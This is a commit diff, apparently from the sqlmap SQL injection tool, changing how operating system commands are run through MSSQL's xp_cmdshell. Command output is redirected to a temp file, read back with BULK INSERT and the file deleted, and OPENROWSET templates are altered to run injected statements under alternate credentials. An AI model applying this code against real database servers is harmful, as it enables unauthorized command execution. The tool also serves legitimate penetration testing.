| FazBrowse GitHub Viewer | Trending | | Home |
| Tools: [Download Repo ZIP] [Original HTTPS Page] |
1 parent d08a54e commit 99c5ea5
3 files changed
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
@@ -820,15 +820,6 @@ def replacePayload(self, inpStr, payload): | |||
| 820 | 820 | ||
| 821 | 821 | def runAsDBMSUser(self, query): | |
| 822 | 822 | if conf.dCred and "Ad Hoc Distributed Queries" not in query: | |
| 823 | - for sqlTitle, sqlStatements in SQL_STATEMENTS.items(): | ||
| 824 | - for sqlStatement in sqlStatements: | ||
| 825 | - if query.lower().startswith(sqlStatement): | ||
| 826 | - sqlType = sqlTitle | ||
| 827 | - break | ||
| 828 | - | ||
| 829 | - if sqlType and "SELECT" not in sqlType: | ||
| 830 | - query = "SELECT %d;%s" % (randomInt(), query) | ||
| 831 | - | ||
| 832 | 823 | query = getSPQLSnippet(DBMS.MSSQL, "run_statement_as_user", USER=conf.dbmsUsername, PASSWORD=conf.dbmsPassword, STATEMENT=query.replace("'", "''")) | |
| 833 | 824 | ||
| 834 | 825 | return query | |
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
@@ -148,12 +148,18 @@ def xpCmdshellWriteFile(self, fileContent, tmpPath, randDestFile): | |||
| 148 | 148 | self.xpCmdshellExecCmd(cmd) | |
| 149 | 149 | ||
| 150 | 150 | def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None): | |
| 151 | + if conf.dCred: | ||
| 152 | + self.tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True)) | ||
| 153 | + cmd = "%s > \"%s\"" % (cmd, self.tmpFile) | ||
| 154 | + | ||
| 151 | 155 | self.__randStr = randomStr(lowercase=True) | |
| 152 | 156 | self.__cmd = "0x%s" % hexencode(cmd) | |
| 153 | 157 | self.__forgedCmd = "DECLARE @%s VARCHAR(8000);" % self.__randStr | |
| 154 | 158 | self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd) | |
| 155 | - if insertIntoTable: | ||
| 159 | + | ||
| 160 | + if insertIntoTable and not conf.dCred: | ||
| 156 | 161 | self.__forgedCmd += "INSERT INTO %s " % insertIntoTable | |
| 162 | + | ||
| 157 | 163 | self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr) | |
| 158 | 164 | ||
| 159 | 165 | return agent.runAsDBMSUser(self.__forgedCmd) | |
@@ -178,6 +184,11 @@ def xpCmdshellEvalCmd(self, cmd, first=None, last=None): | |||
| 178 | 184 | output = new_output | |
| 179 | 185 | else: | |
| 180 | 186 | inject.goStacked(self.xpCmdshellForgeCmd(cmd, self.cmdTblName)) | |
| 187 | + | ||
| 188 | + if conf.dCred: | ||
| 189 | + inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (self.cmdTblName, self.tmpFile, randomStr(10), randomStr(10))) | ||
| 190 | + self.delRemoteFile(self.tmpFile) | ||
| 191 | + | ||
| 181 | 192 | query = "SELECT %s FROM %s" % (self.tblField, self.cmdTblName) | |
| 182 | 193 | ||
| 183 | 194 | if conf.direct or any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR)): | |
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
@@ -1,2 +1,3 @@ | |||
| 1 | - SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','%STATEMENT%') | ||
| 2 | - # SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=%USER%;pwd=%PASSWORD%','%STATEMENT%') | ||
| 1 | + SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','SET FMTONLY OFF %STATEMENT%') | ||
| 2 | + # SELECT * FROM OPENROWSET('SQLNCLI', 'server=(local);trusted_connection=yes','SET FMTONLY OFF SELECT 1;%STATEMENT%') | ||
| 3 | + # SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=%USER%;pwd=%PASSWORD%','SET FMTONLY OFF %STATEMENT%') | ||
| Back | FazBrowse Home | New Git URL |
0 commit comments